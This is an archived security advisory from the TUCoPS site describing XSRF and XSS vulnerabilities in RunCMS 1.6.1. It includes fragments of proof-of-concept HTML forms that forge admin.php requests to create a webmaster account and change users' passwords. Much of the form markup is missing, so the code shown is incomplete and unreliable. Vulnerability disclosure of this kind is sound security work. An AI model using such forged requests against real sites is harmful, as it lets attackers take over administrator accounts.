TUCoPS :: Web :: CMS / Portals :: bx1976.htm

RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties


###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties           by NBBN
###################################################################

[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]


action="http://localhost/xampp/runcms/modules/system/admin.php" 
method="post" enctype="multipart/form-data" name="r">


value="attack@attack.com"> 

























Also with XSRF an attacker can update the profile of all users. He can change 
the password etc...

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]

action="http://localhost/xampp/runcms/modules/system/admin.php" 
method="post" enctype="multipart/form-data" name="r">

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH